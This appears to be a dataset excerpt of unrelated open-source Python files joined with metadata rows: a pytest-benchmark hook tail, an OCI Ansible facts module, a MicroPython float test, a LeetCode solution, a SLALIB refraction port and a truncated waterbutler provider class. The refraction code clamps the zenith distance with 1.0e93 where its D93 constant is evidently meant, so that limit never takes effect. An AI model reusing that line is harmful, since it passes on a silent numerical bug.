.. sourcecode:: python
def pytest_benchmark_compare_machine_info(config, benchmarksession, machine_info, compared_benchmark):
if compared_benchmark["machine_info"] != machine_info:
benchmarksession.logger.warn(
"Benchmark machine_info is different. Current: %s VS saved: %s." % (
format_dict(machine_info),
format_dict(compared_benchmark["machine_info"]),
)
)
"""
pass
pytest_benchmark_generate_commit_info.firstresult = True
pytest_benchmark_generate_json.firstresult = True
pytest_benchmark_generate_machine_info.firstresult = True
pytest_benchmark_group_stats.firstresult = True
| 31.725191 | 120 | 0.672522 |
f534b28874f53b5f9c467ab891cdcbb51dc8f53c | 11,033 | py | Python | plugins/modules/oci_healthchecks_http_monitor_facts.py | LaudateCorpus1/oci-ansible-collection | 2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7 | [
"Apache-2.0"
] | null | null | null | plugins/modules/oci_healthchecks_http_monitor_facts.py | LaudateCorpus1/oci-ansible-collection | 2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7 | [
"Apache-2.0"
] | null | null | null | plugins/modules/oci_healthchecks_http_monitor_facts.py | LaudateCorpus1/oci-ansible-collection | 2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# Copyright (c) 2020, 2022 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_healthchecks_http_monitor_facts
short_description: Fetches details about one or multiple HttpMonitor resources in Oracle Cloud Infrastructure
description:
- Fetches details about one or multiple HttpMonitor resources in Oracle Cloud Infrastructure
- Gets a list of HTTP monitors.
- If I(monitor_id) is specified, the details of a single HttpMonitor will be returned.
version_added: "2.9.0"
author: Oracle (@oracle)
options:
monitor_id:
description:
- The OCID of a monitor.
- Required to get a specific http_monitor.
type: str
aliases: ["id"]
compartment_id:
description:
- Filters results by compartment.
- Required to list multiple http_monitors.
type: str
sort_by:
description:
- The field to sort by when listing monitors.
type: str
choices:
- "id"
- "displayName"
- "timeCreated"
sort_order:
description:
- Controls the sort order of results.
type: str
choices:
- "ASC"
- "DESC"
display_name:
description:
- Filters results that exactly match the `displayName` field.
type: str
aliases: ["name"]
home_region:
description:
- Filters results that match the `homeRegion`.
type: str
extends_documentation_fragment: [ oracle.oci.oracle ]
"""
EXAMPLES = """
- name: Get a specific http_monitor
oci_healthchecks_http_monitor_facts:
# required
monitor_id: "ocid1.monitor.oc1..xxxxxxEXAMPLExxxxxx"
- name: List http_monitors
oci_healthchecks_http_monitor_facts:
# required
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
# optional
sort_by: id
sort_order: ASC
display_name: display_name_example
home_region: us-phoenix-1
"""
RETURN = """
http_monitors:
description:
- List of HttpMonitor resources
returned: on success
type: complex
contains:
id:
description:
- The OCID of the resource.
returned: on success
type: str
sample: "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx"
results_url:
description:
- A URL for fetching the probe results.
returned: on success
type: str
sample: results_url_example
home_region:
description:
- The region where updates must be made and where results must be fetched from.
returned: on success
type: str
sample: us-phoenix-1
time_created:
description:
- The RFC 3339-formatted creation date and time of the probe.
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
compartment_id:
description:
- The OCID of the compartment.
returned: on success
type: str
sample: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
targets:
description:
- A list of targets (hostnames or IP addresses) of the probe.
- Returned for get operation
returned: on success
type: list
sample: []
vantage_point_names:
description:
- A list of names of vantage points from which to execute the probe.
- Returned for get operation
returned: on success
type: list
sample: []
port:
description:
- The port on which to probe endpoints. If unspecified, probes will use the
default port of their protocol.
- Returned for get operation
returned: on success
type: int
sample: 56
timeout_in_seconds:
description:
- "The probe timeout in seconds. Valid values: 10, 20, 30, and 60.
The probe timeout must be less than or equal to `intervalInSeconds` for monitors."
- Returned for get operation
returned: on success
type: int
sample: 56
protocol:
description:
- ""
returned: on success
type: str
sample: HTTP
method:
description:
- ""
- Returned for get operation
returned: on success
type: str
sample: GET
path:
description:
- The optional URL path to probe, including query parameters.
- Returned for get operation
returned: on success
type: str
sample: path_example
headers:
description:
- A dictionary of HTTP request headers.
- "*Note:* Monitors and probes do not support the use of the `Authorization` HTTP header."
- Returned for get operation
returned: on success
type: dict
sample: {}
display_name:
description:
- A user-friendly and mutable name suitable for display in a user interface.
returned: on success
type: str
sample: display_name_example
interval_in_seconds:
description:
- "The monitor interval in seconds. Valid values: 10, 30, and 60."
returned: on success
type: int
sample: 56
is_enabled:
description:
- Enables or disables the monitor. Set to 'true' to launch monitoring.
returned: on success
type: bool
sample: true
freeform_tags:
description:
- "Free-form tags for this resource. Each tag is a simple key-value pair with no
predefined name, type, or namespace. For more information,
see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
Example: `{\\"Department\\": \\"Finance\\"}`"
returned: on success
type: dict
sample: {'Department': 'Finance'}
defined_tags:
description:
- "Defined tags for this resource. Each key is predefined and scoped to a namespace.
For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
Example: `{\\"Operations\\": {\\"CostCenter\\": \\"42\\"}}`"
returned: on success
type: dict
sample: {'Operations': {'CostCenter': 'US'}}
sample: [{
"id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx",
"results_url": "results_url_example",
"home_region": "us-phoenix-1",
"time_created": "2013-10-20T19:20:30+01:00",
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"targets": [],
"vantage_point_names": [],
"port": 56,
"timeout_in_seconds": 56,
"protocol": "HTTP",
"method": "GET",
"path": "path_example",
"headers": {},
"display_name": "display_name_example",
"interval_in_seconds": 56,
"is_enabled": true,
"freeform_tags": {'Department': 'Finance'},
"defined_tags": {'Operations': {'CostCenter': 'US'}}
}]
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceFactsHelperBase,
get_custom_class,
)
try:
from oci.healthchecks import HealthChecksClient
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class HttpMonitorFactsHelperGen(OCIResourceFactsHelperBase):
"""Supported operations: get, list"""
def get_required_params_for_get(self):
return [
"monitor_id",
]
def get_required_params_for_list(self):
return [
"compartment_id",
]
def get_resource(self):
return oci_common_utils.call_with_backoff(
self.client.get_http_monitor,
monitor_id=self.module.params.get("monitor_id"),
)
def list_resources(self):
optional_list_method_params = [
"sort_by",
"sort_order",
"display_name",
"home_region",
]
optional_kwargs = dict(
(param, self.module.params[param])
for param in optional_list_method_params
if self.module.params.get(param) is not None
)
return oci_common_utils.list_all_resources(
self.client.list_http_monitors,
compartment_id=self.module.params.get("compartment_id"),
**optional_kwargs
)
HttpMonitorFactsHelperCustom = get_custom_class("HttpMonitorFactsHelperCustom")
class ResourceFactsHelper(HttpMonitorFactsHelperCustom, HttpMonitorFactsHelperGen):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec()
module_args.update(
dict(
monitor_id=dict(aliases=["id"], type="str"),
compartment_id=dict(type="str"),
sort_by=dict(type="str", choices=["id", "displayName", "timeCreated"]),
sort_order=dict(type="str", choices=["ASC", "DESC"]),
display_name=dict(aliases=["name"], type="str"),
home_region=dict(type="str"),
)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_facts_helper = ResourceFactsHelper(
module=module,
resource_type="http_monitor",
service_client_class=HealthChecksClient,
namespace="healthchecks",
)
result = []
if resource_facts_helper.is_get():
result = [resource_facts_helper.get()]
elif resource_facts_helper.is_list():
result = resource_facts_helper.list()
else:
resource_facts_helper.fail()
module.exit_json(http_monitors=result)
if __name__ == "__main__":
main()
| 32.545723 | 133 | 0.591498 |
bb670586ae5153c457ff5a88c9fad0659426cc65 | 1,244 | py | Python | tests/float/float1.py | 0x0ece/micropython | 4ee07f4883136dfbd1795dea3b04c478072d5630 | [
"MIT"
] | null | null | null | tests/float/float1.py | 0x0ece/micropython | 4ee07f4883136dfbd1795dea3b04c478072d5630 | [
"MIT"
] | null | null | null | tests/float/float1.py | 0x0ece/micropython | 4ee07f4883136dfbd1795dea3b04c478072d5630 | [
"MIT"
] | null | null | null | # test basic float capabilities
# literals
print(.12)
print(1.)
print(1.2)
# float construction
print(float(1.2))
# unary operators
print(bool(0.0))
print(bool(1.2))
print(+(1.2))
print(-(1.2))
# division of integers
x = 1 / 2
print(x)
# /= operator
a = 1
a /= 2
print(a)
# floor division
print(1.0 // 2)
print(2.0 // 2)
# comparison
print(1.2 <= 3.4)
print(1.2 <= -3.4)
print(1.2 >= 3.4)
print(1.2 >= -3.4)
try:
1.0 / 0
except ZeroDivisionError:
print("ZeroDivisionError")
try:
1.0 // 0
except ZeroDivisionError:
print("ZeroDivisionError")
try:
1.2 % 0
except ZeroDivisionError:
print("ZeroDivisionError")
# unsupported unary ops
try:
~1.2
except TypeError:
print("TypeError")
try:
1.2 in 3.4
except TypeError:
print("TypeError")
# can't convert list to float
try:
float([])
except TypeError:
print("TypeError")
# test constant float with more than 255 chars
x = 1.84728699436059052516398251149631771898472869943605905251639825114963177189847286994360590525163982511496317718984728699436059052516398251149631771898472869943605905251639825114963177189847286994360590525163982511496317718984728699436059052516398251149631771898472869943605905251639825114963177189
print("%.5f" % x)
| 17.277778 | 302 | 0.722669 |
21b59cf1f9b78bb9824798ef0bcc3ca7754aa7ec | 675 | py | Python | Leetcode/0632. Smallest Range Covering Elements from K Lists/0632.py | Next-Gen-UI/Code-Dynamics | a9b9d5e3f27e870b3e030c75a1060d88292de01c | [
"MIT"
] | null | null | null | Leetcode/0632. Smallest Range Covering Elements from K Lists/0632.py | Next-Gen-UI/Code-Dynamics | a9b9d5e3f27e870b3e030c75a1060d88292de01c | [
"MIT"
] | null | null | null | Leetcode/0632. Smallest Range Covering Elements from K Lists/0632.py | Next-Gen-UI/Code-Dynamics | a9b9d5e3f27e870b3e030c75a1060d88292de01c | [
"MIT"
] | null | null | null | class Solution:
def smallestRange(self, nums: List[List[int]]) -> List[int]:
minHeap = [(row[0], i, 0) for i, row in enumerate(nums)]
heapq.heapify(minHeap)
maxRange = max(row[0] for row in nums)
minRange = heapq.nsmallest(1, minHeap)[0][0]
ans = [minRange, maxRange]
while len(minHeap) == len(nums):
num, r, c = heapq.heappop(minHeap)
if c + 1 < len(nums[r]):
heapq.heappush(minHeap, (nums[r][c + 1], r, c + 1))
maxRange = max(maxRange, nums[r][c + 1])
minRange = heapq.nsmallest(1, minHeap)[0][0]
if maxRange - minRange < ans[1] - ans[0]:
ans[0], ans[1] = minRange, maxRange
return ans
| 33.75 | 62 | 0.580741 |
d954041a77119f7fa3df54692d23a434e8357d8e | 17,647 | py | Python | kai/reduce/slalib.py | skterry/KAI | b8ccf003bf892692bdf00f4bd112e2a7a2938a5b | [
"BSD-3-Clause"
] | 1 | 2021-07-26T18:56:24.000Z | 2021-07-26T18:56:24.000Z | kai/reduce/slalib.py | skterry/KAI | b8ccf003bf892692bdf00f4bd112e2a7a2938a5b | [
"BSD-3-Clause"
] | null | null | null | kai/reduce/slalib.py | skterry/KAI | b8ccf003bf892692bdf00f4bd112e2a7a2938a5b | [
"BSD-3-Clause"
] | 1 | 2015-11-05T07:39:11.000Z | 2015-11-05T07:39:11.000Z | import math
def refco(HM, TDK, PMB, RH, WL, PHI, TLR, EPS):
"""
Determine the constants A and B in the atmospheric refraction
model dZ = A tan Z + B tan**3 Z.
Z is the "observed" zenith distance (i.e. affected by refraction)
and dZ is what to add to Z to give the "topocentric" (i.e. in vacuo)
zenith distance.
Given:
HM d height of the observer above sea level (metre)
TDK d ambient temperature at the observer (deg K)
PMB d pressure at the observer (millibar)
RH d relative humidity at the observer (range 0-1)
WL d effective wavelength of the source (micrometre)
PHI d latitude of the observer (radian, astronomical)
TLR d temperature lapse rate in the troposphere (degK/metre)
EPS d precision required to terminate iteration (radian)
Returned:
REFA d tan Z coefficient (radian)
REFB d tan**3 Z coefficient (radian)
Called: refco
Notes:
1 Typical values for the TLR and EPS arguments might be 0.0065D0 and
1D-10 respectively.
2 The radio refraction is chosen by specifying WL > 100 micrometres.
3 The routine is a slower but more accurate alternative to the
slRFCQ routine. The constants it produces give perfect
agreement with slRFRO at zenith distances arctan(1) (45 deg)
and arctan(4) (about 76 deg). It achieves 0.5 arcsec accuracy
for ZD < 80 deg, 0.01 arcsec accuracy for ZD < 60 deg, and
0.001 arcsec accuracy for ZD < 45 deg.
P.T.Wallace Starlink 3 June 1997
Copyright (C) 1997 Rutherford Appleton Laboratory
Copyright (C) 1995 Association of Universities for Research in Astronomy Inc.
Migrated from SLALIB (fortran) to python:
J. R. Lu -- 2015-05-13
"""
# Sample zenith distances: arctan(1) and arctan(4)
atn1 = 0.7853981633974483
atn4 = 1.325817663668033
# Determine refraction for the two sample zenith distances
R1 = refro(atn1, HM, TDK, PMB, RH, WL, PHI, TLR, EPS)
R2 = refro(atn4, HM, TDK, PMB, RH, WL, PHI, TLR, EPS)
# Solve for refraction constants
refa = (64.0 * R1 - R2) / 60.0
refb = (R2 - 4.0 * R1) / 60.0
return refa, refb
def refro(ZOBS, HM, TDK, PMB, RH, WL, PHI, TLR, EPS):
"""
Atmospheric refraction for radio and optical/IR wavelengths.
Given:
ZOBS d observed zenith distance of the source (radian)
HM d height of the observer above sea level (metre)
TDK d ambient temperature at the observer (deg K)
PMB d pressure at the observer (millibar)
RH d relative humidity at the observer (range 0-1)
WL d effective wavelength of the source (micrometre)
PHI d latitude of the observer (radian, astronomical)
TLR d temperature lapse rate in the troposphere (degK/metre)
EPS d precision required to terminate iteration (radian)
Returned:
REF d refraction: in vacuo ZD minus observed ZD (radian)
Notes:
1 A suggested value for the TLR argument is 0.0065. The
refraction is significantly affected by TLR, and if studies
of the local atmosphere have been carried out a better TLR
value may be available.
2 A suggested value for the EPS argument is 1D-8. The result is
usually at least two orders of magnitude more computationally
precise than the supplied EPS value.
3 The routine computes the refraction for zenith distances up
to and a little beyond 90 deg using the method of Hohenkerk
and Sinclair (NAO Technical Notes 59 and 63, subsequently adopted
in the Explanatory Supplement, 1992 edition - see section 3.281).
4 The code is a development of the optical/IR refraction subroutine
AREF of C.Hohenkerk (HMNAO, September 1984), with extensions to
support the radio case. Apart from merely cosmetic changes, the
following modifications to the original HMNAO optical/IR refraction
code have been made:
. The angle arguments have been changed to radians.
. Any value of ZOBS is allowed (see note 6, below).
. Other argument values have been limited to safe values.
. Murray's values for the gas constants have been used
(Vectorial Astrometry, Adam Hilger, 1983).
. The numerical integration phase has been rearranged for
extra clarity.
. A better model for Ps(T) has been adopted (taken from
Gill, Atmosphere-Ocean Dynamics, Academic Press, 1982).
. More accurate expressions for Pwo have been adopted
(again from Gill 1982).
. Provision for radio wavelengths has been added using
expressions devised by A.T.Sinclair, RGO (private
communication 1989), based on the Essen & Froome
refractivity formula adopted in Resolution 1 of the
13th International Geodesy Association General Assembly
(Bulletin Geodesique 70 p390, 1963).
. Various small changes have been made to gain speed.
None of the changes significantly affects the optical/IR results
with respect to the algorithm given in the 1992 Explanatory
Supplement. For example, at 70 deg zenith distance the present
routine agrees with the ES algorithm to better than 0.05 arcsec
for any reasonable combination of parameters. However, the
improved water-vapour expressions do make a significant difference
in the radio band, at 70 deg zenith distance reaching almost
4 arcsec for a hot, humid, low-altitude site during a period of
low pressure.
5 The radio refraction is chosen by specifying WL > 100 micrometres.
Because the algorithm takes no account of the ionosphere, the
accuracy deteriorates at low frequencies, below about 30 MHz.
6 Before use, the value of ZOBS is expressed in the range +/- pi.
If this ranged ZOBS is -ve, the result REF is computed from its
absolute value before being made -ve to match. In addition, if
it has an absolute value greater than 93 deg, a fixed REF value
equal to the result for ZOBS = 93 deg is returned, appropriately
signed.
7 As in the original Hohenkerk and Sinclair algorithm, fixed values
of the water vapour polytrope exponent, the height of the
tropopause, and the height at which refraction is negligible are
used.
8 The radio refraction has been tested against work done by
Iain Coulson, JACH, (private communication 1995) for the
James Clerk Maxwell Telescope, Mauna Kea. For typical conditions,
agreement at the 0.1 arcsec level is achieved for moderate ZD,
worsening to perhaps 0.5-1.0 arcsec at ZD 80 deg. At hot and
humid sea-level sites the accuracy will not be as good.
9 It should be noted that the relative humidity RH is formally
defined in terms of "mixing ratio" rather than pressures or
densities as is often stated. It is the mass of water per unit
mass of dry air divided by that for saturated air at the same
temperature and pressure (see Gill 1982).
Called: slDA1P, slATMT, slATMS
P.T.Wallace Starlink 3 June 1997
Copyright (C) 1997 Rutherford Appleton Laboratory
Copyright (C) 1995 Association of Universities for Research in Astronomy Inc.
"""
# Fixed parameters
# 93 degrees in radians
D93 = 1.623156204
# Universal gas constant
GCR = 8314.32
# Molecular weight of dry air
DMD = 28.9644
# Molecular weight of water vapour
DMW = 18.0152
# Mean Earth radius (metre)
S = 6378120.0
# Exponent of temperature dependence of water vapour pressure
DELTA = 18.36
# Height of tropopause (metre)
HT = 11000.0
# Upper limit for refractive effects (metre)
HS = 80000.0
# The refraction integrand
def refi(r, dn, rdndr):
return rdndr / (dn + rdndr)
# Transform ZOBS into the normal range.
ZOBS1 = da1p(ZOBS)
ZOBS2 = min(abs(ZOBS1), 1.0e93)
# Keep other arguments within safe bounds.
HMOK = min(max(HM, -1.0e3), 10.0e3)
TDKOK = min(max(TDK, 100.0), 500.0)
PMBOK = min(max(PMB, 0.0), 10000.0)
RHOK = min(max(RH, 0.0), 1.0)
WLOK = max(WL, 0.1)
ALPHA = min(max(abs(TLR), 0.001), 0.01)
# Tolerance for iteration.
TOL = min(max(abs(EPS), 1.0e-12), 0.1) / 2.0
# Decide whether optical/IR or radio case - switch at 100 microns.
OPTIC = WLOK <= 100.0
# Set up model atmosphere parameters defined at the observer.
WLSQ = WLOK * WLOK
GB = 9.784 * (1.0 - 0.0026 * math.cos(PHI + PHI) - 0.00000028 * HMOK)
if OPTIC:
A = (287.604 + (1.6288 + 0.0136 / WLSQ) / WLSQ) * 273.15e-6 / 1013.25
else:
A = 77.624e-6
GAMAL = (GB * DMD) / GCR
GAMMA = GAMAL / ALPHA
GAMM2 = GAMMA - 2.0
DELM2 = DELTA - 2.0
TDC = TDKOK - 273.15
PSAT = 10.0**((0.7859 + 0.03477 * TDC) / (1.0 + 0.00412 * TDC))
PSAT *= (1.0 + PMBOK * (4.5e-6 + 6e-10 * TDC * TDC))
if (PMBOK > 0.0):
PWO = RHOK * PSAT / (1.0 - (1.0 - RHOK) * PSAT / PMBOK)
else:
PWO = 0.0
W = PWO * (1.0 - DMW / DMD) * GAMMA / (DELTA - GAMMA)
C1 = A * (PMBOK + W) / TDKOK
if OPTIC:
C2 = (A * W + 11.2684e-6 * PWO) / TDKOK
else:
C2 = (A * W + 12.92e-6 * PWO) / TDKOK
C3 = (GAMMA - 1.0) * ALPHA * C1 / TDKOK
C4 = (DELTA - 1.0) * ALPHA * C2 / TDKOK
if OPTIC:
C5 = 0.0
C6 = 0.0
else:
C5 = 371897e-6 * PWO / TDKOK
C6 = C5 * DELM2 * ALPHA / (TDKOK * TDKOK)
# Conditions at the observer.
R0 = S + HMOK
TEMPO, DN0, RDNDR0 = atmt(R0, TDKOK, ALPHA, GAMM2, DELM2,
C1, C2, C3, C4, C5, C6, R0)
SK0 = DN0 * R0 * math.sin(ZOBS2)
F0 = refi(R0, DN0, RDNDR0)
# Conditions in the troposphere at the tropopause.
RT = S + HT
TT, DNT, RDNDRT = atmt(R0, TDKOK, ALPHA, GAMM2, DELM2,
C1, C2, C3, C4, C5, C6, RT)
SINE = SK0 / (RT * DNT)
ZT = math.atan2(SINE, math.sqrt(max(1.0 - SINE * SINE, 0.0)))
FT = refi(RT, DNT, RDNDRT)
# Conditions in the stratosphere at the tropopause.
DNTS, RDNDRP = atms(RT, TT, DNT, GAMAL, RT)
SINE = SK0 / (RT * DNTS)
ZTS = math.atan2(SINE, math.sqrt(max(1.0 - SINE * SINE,0.0)))
FTS = refi(RT, DNTS, RDNDRP)
# Conditions at the stratosphere limit.
RS = S + HS
DNS, RDNDRS = atms(RT, TT, DNT, GAMAL, RS)
SINE = SK0 / (RS * DNS)
ZS = math.atan2(SINE, math.sqrt(max(1.0 - SINE * SINE, 0.0)))
FS = refi(RS, DNS, RDNDRS)
# Integrate the refraction integral in two parts; first in the
# troposphere (K=1), then in the stratosphere (K=2).
# Initialize previous refraction to ensure at least two iterations.
REFOLD = 1.0e6
# Start off with 8 strips for the troposphere integration, and then
# use the final troposphere value for the stratosphere integration,
# which tends to need more strips.
IS = 8
# Troposphere then stratosphere.
for K in [1,2]:
# Start Z, Z range, and start and end values.
if K == 1:
Z0 = ZOBS2
ZRANGE = ZT - Z0
FB = F0
FF = FT
else:
Z0 = ZTS
ZRANGE = ZS - Z0
FB = FTS
FF = FS
# Sums of odd and even values.
FO = 0.0
FE = 0.0
# First time through the loop we have to do every point.
N = 1
# Start of iteration loop (terminates at specified precision).
LOOP = True
while LOOP:
# Strip width.
H = ZRANGE / float(IS)
# Initialize distance from Earth centre for quadrature pass.
if K == 1:
R = R0
else:
R = RT
# One pass (no need to compute evens after first time).
for I in range(1, IS, N):
# Sine of observed zenith distance.
SZ = math.sin(Z0 + H * float(I))
# Find R (to the nearest metre, maximum four iterations).
if SZ > 1e-20:
W = SK0 / SZ
RG = R
DR = 1e6
J = 0
while (abs(DR) > 1.0) and (J < 4):
J = J + 1
if K == 1:
TG, DN, RDNDR = atmt(R0, TDKOK, ALPHA, GAMM2, DELM2,
C1, C2, C3, C4, C5, C6, RG)
else:
DN, RDNDR = atms(RT, TT, DNT, GAMAL, RG)
DR = (RG * DN - W) / (DN + RDNDR)
RG = RG - DR
R = RG
# Find the refractive index and integrand at R.
if K == 1:
T, DN, RDNDR = atmt(R0, TDKOK, ALPHA, GAMM2, DELM2,
C1, C2, C3, C4, C5, C6, R)
else:
DN,RDNDR = atms(RT, TT, DNT, GAMAL, R)
F = refi(R, DN, RDNDR)
# Accumulate odd and (first time only) even values.
if (N == 1) and ((I % 2) == 0):
FE = FE + F
else:
FO = FO + F
# Evaluate the integrand using Simpson's Rule.
REFP = H * (FB + 4.0 * FO + 2.0 * FE + FF) / 3.0
# Has the required precision been achieved?
if (abs(REFP - REFOLD) > TOL):
# No: prepare for next iteration.
# Save current value for convergence test.
REFOLD = REFP
# Double the number of strips.
IS = IS + IS
# Sum of all current values = sum of next pass's even values.
FE = FE + FO
# Prepare for new odd values.
FO = 0.0
# Skip even values next time.
N = 2
else:
# Yes: save troposphere component and terminate the loop.
if (K == 1):
REFT = REFP
LOOP = False
# END IF
# END FOR
# END WHILE
# Result.
REF = REFT + REFP
if (ZOBS1 < 0.0):
REF = -REF
return REF
def atmt(R0, T0, ALPHA, GAMM2, DELM2, C1, C2, C3, C4, C5, C6, R):
"""
Internal routine used by REFRO
Refractive index and derivative with respect to height for the
troposphere.
Given:
R0 d height of observer from centre of the Earth (metre)
T0 d temperature at the observer (deg K)
ALPHA d alpha )
GAMM2 d gamma minus 2 ) see HMNAO paper
DELM2 d delta minus 2 )
C1 d useful term )
C2 d useful term )
C3 d useful term ) see source
C4 d useful term ) of slRFRO
C5 d useful term )
C6 d useful term )
R d current distance from the centre of the Earth (metre)
Returned:
T d temperature at R (deg K)
DN d refractive index at R
RDNDR d R rate the refractive index is changing at R
Note that in the optical case C5 and C6 are zero.
P.T.Wallace Starlink 30 May 1997
Copyright (C) 1997 Rutherford Appleton Laboratory
Copyright (C) 1995 Association of Universities for Research in Astronomy Inc.
"""
T = max(min(T0 - ALPHA * (R - R0), 320.0), 100.0)
TT0 = T / T0
TT0GM2 = TT0**GAMM2
TT0DM2 = TT0**DELM2
DN = 1.0 + (C1 * TT0GM2 - (C2 - C5 / T) * TT0DM2) * TT0
RDNDR = R * (-C3 * TT0GM2 + (C4 - C6 / TT0) * TT0DM2)
return T, DN, RDNDR
def atms(RT, TT, DNT, GAMAL, R):
"""
Internal routine used by REFRO
Refractive index and derivative with respect to height for the
stratosphere.
Given:
RT d height of tropopause from centre of the Earth (metre)
TT d temperature at the tropopause (deg K)
DNT d refractive index at the tropopause
GAMAL d constant of the atmospheric model = G MD/R
R d current distance from the centre of the Earth (metre)
Returned:
DN d refractive index at R
RDNDR d R rate the refractive index is changing at R
P.T.Wallace Starlink 14 July 1995
Copyright (C) 1995 Rutherford Appleton Laboratory
Copyright (C) 1995 Association of Universities for Research in Astronomy Inc.
"""
B = GAMAL / TT
W = (DNT - 1.0) * math.exp(-B * (R - RT))
DN = 1.0 + W
RDNDR = -R * B * W
return DN, RDNDR
def da1p(ANGLE):
"""
Normalize angle into range +/- pi (double precision)
Given:
ANGLE dp the angle in radians
The result (double precision) is ANGLE expressed in the range +/- pi.
P.T.Wallace Starlink 23 November 1995
Copyright (C) 1995 Rutherford Appleton Laboratory
Copyright (C) 1995 Association of Universities for Research in Astronomy Inc.
"""
DPI = 3.141592653589793238462643
D2PI = 6.283185307179586476925287
slDA1P = ANGLE % D2PI
if (abs(slDA1P) >= DPI):
slDA1P = slDA1P - math.copysign(D2PI, ANGLE)
return slDA1P
| 34.875494 | 81 | 0.576132 |
45adbece26d8f636297e7907914b77581dfacfad | 23,534 | py | Python | waterbutler/core/provider.py | alexschiller/waterbutler | 24014d7705aca3e99a6565fc3b9b4075ec6ec563 | [
"Apache-2.0"
] | null | null | null | waterbutler/core/provider.py | alexschiller/waterbutler | 24014d7705aca3e99a6565fc3b9b4075ec6ec563 | [
"Apache-2.0"
] | null | null | null | waterbutler/core/provider.py | alexschiller/waterbutler | 24014d7705aca3e99a6565fc3b9b4075ec6ec563 | [
"Apache-2.0"
] | null | null | null | import abc
import time
import asyncio
import logging
import weakref
import functools
import itertools
from urllib import parse
import furl
import aiohttp
from waterbutler import settings
from waterbutler.core import streams
from waterbutler.core import exceptions
from waterbutler.core.utils import ZipStreamGenerator
from waterbutler.core.utils import RequestHandlerContext
logger = logging.getLogger(__name__)
_THROTTLES = weakref.WeakKeyDictionary()
def throttle(concurrency=10, interval=1):
def _throttle(func):
@functools.wraps(func)
async def wrapped(*args, **kwargs):
if asyncio.get_event_loop() not in _THROTTLES:
count, last_call, event = 0, time.time(), asyncio.Event()
_THROTTLES[asyncio.get_event_loop()] = (count, last_call, event)
event.set()
else:
count, last_call, event = _THROTTLES[asyncio.get_event_loop()]
await event.wait()
count += 1
if count > concurrency:
count = 0
if (time.time() - last_call) < interval:
event.clear()
await asyncio.sleep(interval - (time.time() - last_call))
event.set()
last_call = time.time()
return (await func(*args, **kwargs))
return wrapped
return _throttle
def build_url(base, *segments, **query):
url = furl.furl(base)
# Filters return generators
# Cast to list to force "spin" it
url.path.segments = list(filter(
lambda segment: segment,
map(
# Furl requires everything to be quoted or not, no mixtures allowed
# prequote everything so %signs don't break everything
lambda segment: parse.quote(segment.strip('/')),
# Include any segments of the original url, effectively list+list but returns a generator
itertools.chain(url.path.segments, segments)
)
))
url.args = query
return url.url
class BaseProvider(metaclass=abc.ABCMeta):
"""The base class for all providers. Every provider must, at the least, implement all abstract
methods in this class.
.. note::
When adding a new provider you must add it to setup.py's
`entry_points` under the `waterbutler.providers` key formatted
as: `<provider name> = waterbutler.providers.yourprovider:<FullProviderName>`
Keep in mind that `yourprovider` modules must export the provider class
"""
BASE_URL = None
def __init__(self, auth, credentials, settings, retry_on={408, 502, 503, 504}):
"""
:param dict auth: Information about the user this provider will act on the behalf of
:param dict credentials: The credentials used to authenticate with the provider,
ofter an OAuth 2 token
:param dict settings: Configuration settings for this provider,
often folder or repo
"""
self._retry_on = retry_on
self.auth = auth
self.credentials = credentials
self.settings = settings
@abc.abstractproperty
def NAME(self):
raise NotImplementedError
def __eq__(self, other):
try:
return (
type(self) == type(other) and
self.credentials == other.credentials
)
except AttributeError:
return False
def serialized(self):
return {
'name': self.NAME,
'auth': self.auth,
'settings': self.settings,
'credentials': self.credentials,
}
def build_url(self, *segments, **query):
"""A nice wrapper around furl, builds urls based on self.BASE_URL
:param tuple \*segments: A tuple of strings joined into /foo/bar/..
:param dict \*\*query: A dictionary that will be turned into query parameters ?foo=bar
:rtype: str
"""
return build_url(self.BASE_URL, *segments, **query)
@property
def default_headers(self):
"""Headers to be included with every request
Commonly OAuth headers or Content-Type
"""
return {}
def build_headers(self, **kwargs):
headers = self.default_headers
headers.update(kwargs)
return {
key: value
for key, value in headers.items()
if value is not None
}
@throttle()
async def make_request(self, method, url, *args, **kwargs):
"""A wrapper around :func:`aiohttp.request`. Inserts default headers.
:param str method: The HTTP method
:param str url: The url to send the request to
:keyword range: An optional tuple (start, end) that is transformed into a Range header
:keyword expects: An optional tuple of HTTP status codes as integers raises an exception
if the returned status code is not in it.
:type expects: tuple of ints
:param Exception throws: The exception to be raised from expects
:param tuple \*args: args passed to :func:`aiohttp.request`
:param dict \*\*kwargs: kwargs passed to :func:`aiohttp.request`
:rtype: :class:`aiohttp.Response`
:raises ProviderError: Raised if expects is defined
"""
kwargs['headers'] = self.build_headers(**kwargs.get('headers', {}))
retry = _retry = kwargs.pop('retry', 2)
range = kwargs.pop('range', None)
expects = kwargs.pop('expects', None)
throws = kwargs.pop('throws', exceptions.ProviderError)
if range:
kwargs['headers']['Range'] = self._build_range_header(range)
